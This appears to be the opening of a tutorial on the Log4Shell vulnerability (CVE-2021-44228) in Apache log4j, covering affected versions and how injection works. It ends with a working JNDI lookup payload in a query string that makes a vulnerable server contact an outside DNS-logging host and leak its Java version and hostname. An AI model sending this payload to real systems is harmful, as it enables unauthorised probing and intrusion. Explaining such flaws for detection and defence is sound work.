How it works, where to practice, and how to identify Description Java logging library, log4j, has an unauthenticated RCE vulnerability if a user-controlled string is logged. CVE-2021–44228 (Log4Shell) Affected versions — Apache log4j 2.0-beta9 ≤ 2.14.1 How It Works Specially crafted payload is injected into Headers, Input Fields, or Query/Body parameters https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}